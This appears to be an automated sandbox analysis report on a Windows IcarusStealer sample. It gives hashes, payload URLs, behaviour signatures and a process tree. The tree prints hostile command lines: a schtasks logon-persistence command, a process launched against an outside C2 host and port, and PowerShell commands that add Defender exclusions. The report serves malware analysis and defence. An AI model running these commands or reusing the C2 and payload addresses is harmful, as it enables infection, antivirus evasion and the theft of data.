Analysis
-
max time kernel
300s -
max time network
301s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
-
submitted
09/03/2024, 05:50
General
-
Target
custom1.exe
-
Size
24.9MB
-
MD5
4e1c29f0c1af62ddea916c6b80548c76
-
SHA1
38d9f15356b6a65f4e76ee739867d55b01493793
-
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
-
SHA512
f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28
-
SSDEEP
49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
-
Executes dropped EXE 5 IoCs
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 22 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Modifies registry class 14 IoCs
-
Suspicious behavior: EnumeratesProcesses 27 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 31 IoCs
-
Suspicious use of FindShellTrayWindow 27 IoCs
-
Suspicious use of SendNotifyMessage 22 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\custom1.exe"C:\Users\Admin\AppData\Local\Temp\custom1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'4⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp55E0.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\CatRoot\$SXR\$SXR.exe"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\switched.exe"C:\Users\Admin\AppData\Local\Temp\switched.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD55⤵
-
-
C:\Windows\system32\find.exefind /i /v "md5"5⤵
-
-
C:\Windows\system32\find.exefind /i /v "certutil"5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tesetey.exe"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pta523kl\pta523kl.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES413F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC2D9803E0B14495BD4754D3AAD3A8B4.TMP"5⤵
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"4⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
14KB
MD5f6f8b9117c629792f95816234241e74e
SHA1edf6af637027338bc13bc0e3f4f8dcc14430a702
SHA25698073bae6ff2ac95d36f379180ebecf3f0012bc2db0ab14b26f1257e7b9a29d2
SHA51231740b2e837d43e9ffacdf2491018a4f94a9ec46aa3605b5cc00e94a4962938bfc3ee1ea3a553d5ba7cf780caa466a8d42dd01e3b82330ec98415448461ecab6
-
Filesize
16KB
MD548474fca569cc6db29f186ca0034a645
SHA170491a9c8fdf8d97a5c27ef9927a1b7bc9a330a0
SHA256d388ef6a77a2d52b11048ef62228ffcd2e8d29023f3e2943db62454871ae460b
SHA512559d033cc248888696812d071c3fdafff708417d0c8e2a2a472fe7e5e12cc0652b50c7c1ae0ce290967a0b29383c90daac3b8231b5b460a8c0fc98efccedbc41
-
Filesize
1.2MB
MD5c3d69e7c656e591f53379716e1398b3c
SHA1000d1f4ebc8b606f8373edb400340aad3856645f
SHA256688a54a86ec868aebfecfd19f264c404b06985875423a3a0e99d07eb70b7c28d
SHA5129d5de521846fc3b08599b41e17e4f20bbb7219e102417a6967d4dddc354127ee4c25c038d592104db94b3003fd425c0650dd32a140c4381e9bd4d9b66ad3ea20
-
Filesize
4.1MB
MD521c89a986dee64dc1527a2c8b6bfe9a4
SHA14aaf7108065e7b2fe0f5a55fd316a44c96a6ce31
SHA25653a39137cc80da37161dfe39ec363cb77adfdf3593a2b2d4c2bf273461fdbc34
SHA5125ff1c300d88b76a227e7c9fca39b3fc812a102459d46e4b4db52b1cd0918b062355d3b21ae45465cd331b18f3a175506c56e909a4ccf55c3730342443f9d4172
-
Filesize
1.2MB
MD53fa66a5dc56a96ec8c800e0d016061e6
SHA1a05966efd58c254d424c72418617dcaf5c394cf5
SHA256a2d2435547fd5b4a1659561bc7e97025fce78e67fd35423e5ff1d93798d12ad5
SHA51254b0010b60cd0cc09654abb13ba51f8fcbaf25d37b3da9d54974370a640572dc707077e056f7f1a2f3f331a36fbf11835fad70502b69754452d0b1a38688f5c9
-
Filesize
1KB
MD549dcb0c2471d3086d11471186e43358f
SHA1db535e23ed148c3e9013be364d1802433ab271d0
SHA256a4799b4b862a4f9a502035857b1ce40fd3125765849589ae50ba286fac4cea58
SHA512fc7767f1a888fc2ed4b8f309d342f46dedf49212707f7623e05e35f5c0180adef366b652cdc7c2b46faac5eb340ef8908ed567111e3455b49d7ce6eb7468a239
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
569KB
MD5f518b5a470525789a0f99c69a0e3b12d
SHA13f17e0c34b4ed609a1a98b17eb3b6051a8ecd1a1
SHA25660c184bfe1eb2624371ac23a5c75500041c55a4eb986c194fdaefabbff9b1a4e
SHA512093bcf69224f442b83edcb7ec864ef1108ca18d74a3f1c0f62deefc3c8f0944894916b293b5dc439237793154ddfb11693b56fa003eb67e3fe8167a42f323a13
-
Filesize
414KB
MD5966cc45d9dd94b341bd78039b76584a3
SHA1e634bf85dd71f1a5ca3ff798e38e377d8fea94c4
SHA2565d4a3d183469e7b3ece2de12b4e6342dd81c43155c4bade23e00fcf46db8aebf
SHA5128facf2e574295f7471a687a2e4c175479c40df2642ed06bc5426c3ce47ef317db413b4a652210e169fcbce38f16f28aac2364ad4aa1af832f1cf1063e4bcf5da
-
Filesize
534KB
MD5e203037061b7a829872d50039d5ebff8
SHA134f50ddc0ddb28334928be175c12850378250333
SHA2567c649176cdbe9880a20e5a31eee874f4403fd2d6c356f4bd72db3c16792afd27
SHA51203e09ac3f8e8c9b511b493ac84bb56786d18a842897951f50aa8b7d554c8c5c214f67a24a9c0668d66c9629f5e88d078df5942c05ba0b8b9e1bfe62710660a0b
-
Filesize
739KB
MD518a41d57f0bc663ff3826c998b65c5e7
SHA102684c0d59e90975d515d3a6f0fd8ff57e7bfc57
SHA256c2ad39724f9cfa0eef637934c13bd158a85c166ef3a49cd4dcd652084eb42cc9
SHA5126113737a926cce55362f71f5b1f10562b2182b4dbfdecf8888b9263dfb89997df7ae29923c16021394dd36fb3d5ab57533d486501ed47277a1472a435984393e
-
Filesize
1.1MB
MD5036e108a4f73f753a1d0f00c8a7c2228
SHA197da5232f86a0d653fc9ed99f57efa05e2ea21d7
SHA256074fe6a1c44c3f6224b7614fca4d44c4defc9144e76c28911e6318388513e840
SHA512e300ec472b991deea4f4ec81c515f24b58fee3a8f8b2fb42cda851b68ffdf1f187ad9476571ce2fba9ce441b21bf3bf7841962303f7c3f2f7a614efe5d2b43a4
-
Filesize
1.0MB
MD5fed647d8103a9a9741674a46a0f09f77
SHA1de63112e832e0fd47fe6d988b4f8e8fc38b4ae74
SHA256bf30bb5d79222206b871b7c231522ab372d974ea02cee4649a0204a6ca68903f
SHA512b523f038554d19a86255c342e3465be9779b0c6a8a205478d2e928c1e7aa93a763c5196e2c3d81820ba2cad7b35b5e6073876e5aa3d4b0512c0fce271776c0d8
-
Filesize
494KB
MD50f0838bc6642dd6bc603368e50b4aba3
SHA1932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA2564acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860
-
Filesize
150B
MD5bf840142d086cdf888366b1b974328e5
SHA186df54a8749125fb447141e9c38adc0785dbf803
SHA2567b82b06ce5196f9966c486ba14a52690adb96b3b752261d1bfa04170e754ce8f
SHA51298063ff36ff21afa5296b6806918b470562391b05f8a19e3773ea521935847725908ad9ed9aae58c0fb639751d66da1bd7766d9ca7fb9c1048f1c1f41e6606b4
-
Filesize
1009KB
MD5238da518ede84f88e8df9cbd1301b0b8
SHA1db79ff5960f55fe3bed7a975e129e6423583cca8
SHA25629afa203888ced447a5b8a4ca0cd7d1a39415483f92a7de1625ce68b5e190a4a
SHA51200d72dd99818e06cdea41367997474ab4dbecd80b4c20e5de5b1875843bc337c0dce971b0df16535d11f7a6e77b693cd2d4c22136378a153c32763f3399dc5d4
-
Filesize
57KB
MD5f9e3b2883c68494cb0bac4fc562e950d
SHA1181e0d484611f4b46d880f39e8a3922f26732c54
SHA2564c52fe7fe052b4fabb9496e444fcb4bb198519c13993d80a99dffa8bece6a84e
SHA512971505988805e9288737e48471c1be02e23dbc63935d569f191a544c4a275aee7747998c8ca8d66f11e9d330743ce8760ac83f54eafbbba5ff0ddd0ac8d13bf4
-
Filesize
58B
MD579668a6729f0f219835c62c9e43b7927
SHA10cbbc7cc8dbd27923b18285960640f3dad96d146
SHA2566f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3
-
Filesize
1KB
MD5e9144225655a1177485a6238f397718e
SHA10618d989814312c38b8005fc469222f891470642
SHA256f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d
SHA512392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4
-
Filesize
1KB
MD514846c9faaef9299a1bf17730f20e4e6
SHA18083da995cfaa0e8e469780e32fcff1747850eb6
SHA25661bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1
-
Filesize
448B
MD54f758e8a180cbbbab05a7cf183969b5e
SHA1ace4323501302a2ba1a3e6790d0e250c52bff4a5
SHA256eef9ebe5ba7a4a4e70831d84ddd66e599c757aeb8343c2e5c1919aa2a3aeba71
SHA512d31120dd9e195a6d2d8c9606a0e98c93473de81b54dbcfe046b6e6e907bd2c509da10b026bd189924125fb36e3fef3a6c32e152bbefe3ca15973dc1e7dbdf6ee
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
144KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
3.3MB
-
Filesize
32KB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
104KB
-
Filesize
84KB
-
Filesize
304KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
4.2MB
-
Filesize
4.2MB
-
Filesize
7.7MB
-
Filesize
520KB
-
Filesize
624KB
-
Filesize
7.7MB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
5.6MB
-
Filesize
68KB
-
Filesize
64KB
-
Filesize
600KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
56KB
-
Filesize
64KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
216KB
-
Filesize
40KB
-
Filesize
7.7MB
-
Filesize
136KB
-
Filesize
304KB
-
Filesize
64KB
-
Filesize
104KB
-
Filesize
6.5MB
-
Filesize
120KB
-
Filesize
208KB
-
Filesize
656KB